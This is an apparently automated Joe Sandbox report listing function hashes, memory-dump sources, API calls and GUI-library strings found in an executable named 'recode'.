                            • Opcode ID: d1ba85553e95979fe09041fb53cc58437645577c49201d1ae6c2ed7c7d94c9f7
                            • Instruction ID: be79adb3625ec4f6771afc3ab4921050a6aeb78ce91a8938ee212839ad3797aa
                            • Opcode Fuzzy Hash: d1ba85553e95979fe09041fb53cc58437645577c49201d1ae6c2ed7c7d94c9f7
                            • Instruction Fuzzy Hash: 99612222D28A9D82E163723A91425B9E1904F7F38AEADD733F84D359F1EF2C31C50518
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 288df2fd5d168fc6a7b895d1eb10c9c2d4987aa47d01bdbd80ddd1eed73e0356
                            • Instruction ID: ccc2dfe30ad2b20cb71e78219a4b3d866f65672ef18429a495f2cb948bba97fe
                            • Opcode Fuzzy Hash: 288df2fd5d168fc6a7b895d1eb10c9c2d4987aa47d01bdbd80ddd1eed73e0356
                            • Instruction Fuzzy Hash: 7C712212D08B8D42E023A33B91125B5E2521F7F7C4E6CD733F86E315A1EF28B2D95928
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                            • String ID:
                            • API String ID: 2933794660-0
                            • Opcode ID: 1e7e34961b0ff368d9259f46a631c6023798f87f641460ec3e4101f183495e56
                            • Instruction ID: 4e4852c23007fe59132dd2f8d8c63009634846275b451b304e34d08ea6580d4d
                            • Opcode Fuzzy Hash: 1e7e34961b0ff368d9259f46a631c6023798f87f641460ec3e4101f183495e56
                            • Instruction Fuzzy Hash: 15117022B15F458AEB00DF61E8442B8B3A4FB59758F881E31DB2D467A4DF7CD1998350
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID: <NULL>$[nav] NavInitRequest: from move, window "%s", layer=%d$[nav] NavMoveRequest: clamp NavRectRel for gamepad move$[nav] NavMoveRequestForward %d
                            • API String ID: 0-586442257
                            • Opcode ID: 690a005ab7af66ac8f65ff07ab89e592973130c6f6d1717f792c15fcac168659
                            • Instruction ID: a1739413e8dccadc6f41641d062c6ba73ad2388d39ff13e6887c1172eb862eb9
                            • Opcode Fuzzy Hash: 690a005ab7af66ac8f65ff07ab89e592973130c6f6d1717f792c15fcac168659
                            • Instruction Fuzzy Hash: 03223822E087C587E752EB3684012B9F350EF6A764F5D8731DF5C261E5EF2870898768
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: FormatInfoLocaleMessage
                            • String ID: !x-sys-default-locale
                            • API String ID: 4235545615-2729719199
                            • Opcode ID: 7675db42999968172565dd587b6bc4d9fec7a9d2f9b9ff111f740ac6b1d2d352
                            • Instruction ID: 47d198640ccfac83b82e81d9abbcda05a319e98681c17d274a9042011535ca7e
                            • Opcode Fuzzy Hash: 7675db42999968172565dd587b6bc4d9fec7a9d2f9b9ff111f740ac6b1d2d352
                            • Instruction Fuzzy Hash: 37018B72B0878283F7119B12A450B6AE7A1FB88788F984135DA4D06BC4DE3CD8098724
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65f5de4cff587d394fdac7c5d57e6141fa2c5fbdd011f0737969a26f60a1bd7d
                            • Instruction ID: dc783359920a0ee67891fe8e2e0f8b306640d9ae5c54943e049ad0d9a04ded55
                            • Opcode Fuzzy Hash: 65f5de4cff587d394fdac7c5d57e6141fa2c5fbdd011f0737969a26f60a1bd7d
                            • Instruction Fuzzy Hash: 4D71AE12D2CF8E46E023723645421B6E2555F7F285E6DD723BCAE318F1AF1970DB5128
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID:
                            • API String ID: 2162964266-0
                            • Opcode ID: f46fef4588b1f3a54b1cc1155fe25963bbc3be7f011017fd62116e220f623e5d
                            • Instruction ID: 779d87b7634d5b689524d58d504de54aa5043c3e9fecef8b65df96859f82d22e
                            • Opcode Fuzzy Hash: f46fef4588b1f3a54b1cc1155fe25963bbc3be7f011017fd62116e220f623e5d
                            • Instruction Fuzzy Hash: 9823C532A087C59BE75A9B3681413B9F7A0FF59344F888725DB6D235E1DB38B0A8C714
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove$memset
                            • String ID:
                            • API String ID: 3790616698-0
                            • Opcode ID: 621d5a6e91c54b21ebbc09b495eaf79d4cba85c4082f09ab982111f70203d7a1
                            • Instruction ID: 6d6a936dfce4e6902a726ec80fba201d001bb3e155d3263f1ea861763deaa20c
                            • Opcode Fuzzy Hash: 621d5a6e91c54b21ebbc09b495eaf79d4cba85c4082f09ab982111f70203d7a1
                            • Instruction Fuzzy Hash: 5D524776705B8986DB20DF2AD5846EDB760FB89B88F458226DF4E07B68CF39D158C700
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID: @
                            • API String ID: 3445610689-2766056989
                            • Opcode ID: 72f1d6c30f2319be7865358cd199b5206d339a4e9c94c151f11a30eaf5e7c1e6
                            • Instruction ID: 864b95e26704c581e994a5ce8cccd3dfdc3d8ce3ff98eea91a1124beee56b64d
                            • Opcode Fuzzy Hash: 72f1d6c30f2319be7865358cd199b5206d339a4e9c94c151f11a30eaf5e7c1e6
                            • Instruction Fuzzy Hash: 08122B23D0CBCD86E663A63790412B6F350AFAE384F5C8731ED5C365E2DF29B4859614
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID: @
                            • API String ID: 3445610689-2766056989
                            • Opcode ID: 46575f1cd323fe0297ff4fbcc55ce74e1228904fa52ef2a583cd22547f9aa0b3
                            • Instruction ID: 2979c8c6d9372274123889da87c13d59467ee6b99d6bad196d7c41ab71afa1fc
                            • Opcode Fuzzy Hash: 46575f1cd323fe0297ff4fbcc55ce74e1228904fa52ef2a583cd22547f9aa0b3
                            • Instruction Fuzzy Hash: AC12FB23D1C7CD87E253A63790422BAF350AFAE384F5C9732ED4C266E2DF2975858614
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID: @
                            • API String ID: 3445610689-2766056989
                            • Opcode ID: 3fb4eda2a78adc1b34fb0a52c4ad887fb0a0e34e849c03a7845ffb271f10caf7
                            • Instruction ID: d6ebd982453622c7d048024fe29f82ae86323d1a69abba0bf110eb37c82ef3ae
                            • Opcode Fuzzy Hash: 3fb4eda2a78adc1b34fb0a52c4ad887fb0a0e34e849c03a7845ffb271f10caf7
                            • Instruction Fuzzy Hash: F812DC23D0CBCD86E663A63794421B6F350AF6E7C4F5C8732EE4C366E2DF2965848614
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID: @
                            • API String ID: 3445610689-2766056989
                            • Opcode ID: bdf8a5108188d0912c928daf5514e6aec9c5b901fca40889fc2c87942bdcc7bc
                            • Instruction ID: e7ca9f149ccf0ef06b69bd145f7c83cf64256724a985d934f79d061c580242c6
                            • Opcode Fuzzy Hash: bdf8a5108188d0912c928daf5514e6aec9c5b901fca40889fc2c87942bdcc7bc
                            • Instruction Fuzzy Hash: 6712FC23D0CBCD87E652A63791412B6E350AF6F7C4F5C8732EE4C366E2DF29A1858614
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID: #RESIZE$X?
                            • API String ID: 0-1702540906
                            • Opcode ID: 3d8a80719b9331a2956df997aecb6dfce3fd79b64341bdc0a91589c2a15663a0
                            • Instruction ID: e5a47f54037e15369f01eb0406dd08ef0c4159a99f888c31331aafb5b8bad76f
                            • Opcode Fuzzy Hash: 3d8a80719b9331a2956df997aecb6dfce3fd79b64341bdc0a91589c2a15663a0
                            • Instruction Fuzzy Hash: D252D633D08B898BE352DB3794411BDF760EF5A354F5D8721EE8C265E1EB28B4888B54
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID: ##ComboPopup$##Combo_%02d
                            • API String ID: 0-4115995950
                            • Opcode ID: 6070e807bdff3e9d3c4a81e8b6c647e75420b244936fd54365f5a6d6fd2c82e6
                            • Instruction ID: 2472a22c4e3ca26d8b8506e7dabfa0fb8b8d7ae24d8e460b23315c1ae4f7c513
                            • Opcode Fuzzy Hash: 6070e807bdff3e9d3c4a81e8b6c647e75420b244936fd54365f5a6d6fd2c82e6
                            • Instruction Fuzzy Hash: 3C32C132E08A858BE711EB66E4402ADF770EF89344F985235EE4C276E5DF38E448CB54
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID: #CLOSE$#COLLAPSE
                            • API String ID: 0-3250029216
                            • Opcode ID: 9d95bc19197b0ab61f19a15649370599392cb8a49d289c0943e1b4ed6441d12f
                            • Instruction ID: 6a56a2c236609cda8d09154c4aa5d0bda8737e153c2d88a022de474d42a7a6ec
                            • Opcode Fuzzy Hash: 9d95bc19197b0ab61f19a15649370599392cb8a49d289c0943e1b4ed6441d12f
                            • Instruction Fuzzy Hash: 9CE11832E04B898AE712DB3294411B9F360AF6D394F899732DE5C372D1EB3960998754
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memset
                            • String ID:
                            • API String ID: 2221118986-0
                            • Opcode ID: 4e77a4257d10bb4d628b5f0dd0f7ea76fa89fbc0de37aee19a9862cc0838d949
                            • Instruction ID: 606a8c330af4fe550f9c565f41f224f4f68ab7f47e9d506e86fb5c58a80c0fec
                            • Opcode Fuzzy Hash: 4e77a4257d10bb4d628b5f0dd0f7ea76fa89fbc0de37aee19a9862cc0838d949
                            • Instruction Fuzzy Hash: DFC1D832A08AC986E7619F26D0452B9F360FF58784F588331DF8D136A0EF39E556CB14
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: memmove
                            • String ID: (
                            • API String ID: 2162964266-3887548279
                            • Opcode ID: b98ecd9055e2bdeb0bdde2e4a80341c4f88354f3b7837c41e9c3d381e59f9c6c
                            • Instruction ID: 917284afbc3fcea806dd87b868114abe738eec8285fb9edcfc72e39c6ea08219
                            • Opcode Fuzzy Hash: b98ecd9055e2bdeb0bdde2e4a80341c4f88354f3b7837c41e9c3d381e59f9c6c
                            • Instruction Fuzzy Hash: 10C28D33A25B8886D702DF3BC481169B7A0FFA9B84B59D712EE09237B5DB35E454DB00
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID:
                            • API String ID: 3445610689-0
                            • Opcode ID: e6f28d1fffea5cf1ec40eb1a14450ed62193a535dc06621ed51807f10df407cb
                            • Instruction ID: efde098eb38dfb164885354e6584c448f2b89d72180d970f6e6463788736f047
                            • Opcode Fuzzy Hash: e6f28d1fffea5cf1ec40eb1a14450ed62193a535dc06621ed51807f10df407cb
                            • Instruction Fuzzy Hash: 3E22DA22D1CBCD86E263A63794422B6F350AFAE385F5C9732ED4C365F2DF2970858614
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID: powf
                            • String ID:
                            • API String ID: 3445610689-0
                            • Opcode ID: 43c82e8f00812fbef8fe2ab406deb5957907c42c3f3f86e4085d1b4caf34b3fc
                            • Instruction ID: 35b0674000d7b6aef0a5a3164dabe8541c166cf3f54cfe89611187c4ab8b8f8b
                            • Opcode Fuzzy Hash: 43c82e8f00812fbef8fe2ab406deb5957907c42c3f3f86e4085d1b4caf34b3fc
                            • Instruction Fuzzy Hash: ED22D722D0CBCD86E262A63794422B6F350AFAE385F5C9B32ED4C355F2DF2974848614
                            Strings
                            • [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s", xrefs: 00007FF7580120C8
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858245456.00007FF7580C3000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858262425.00007FF7580D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858274809.00007FF7580DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff758000000_recode.jbxd
                            Similarity
                            • API ID:
                            • String ID: [nav] NavInitRequest: ApplyResult: NavID 0x%08X in Layer %d Window "%s"
                            • API String ID: 0-1553127323
                            • Opcode ID: 146c37eb38bd7daf7c3e569147e5a8b8496f4c39fc2b25188b7eda05d1a4f20e
                            • Instruction ID: 012e0e4c2bc0312aef9a5dd6a72b89b0e169c38dacc325fb8aa04035a6ef78dd
                            • Opcode Fuzzy Hash: 146c37eb38bd7daf7c3e569147e5a8b8496f4c39fc2b25188b7eda05d1a4f20e
                            • Instruction Fuzzy Hash: 9052C462D092C28BE765EF2594403BDE7E0EF45B18F9C8235CB5C172E1EF3864998768
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.3858173610.00007FF758001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF758000000, based on PE: true
                            • Associated: 00000000.00000002.3858161581.00007FF758000000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.3858211770.00007FF758062000.00000002.00000001.01000000.00000003.sdmpDownload File
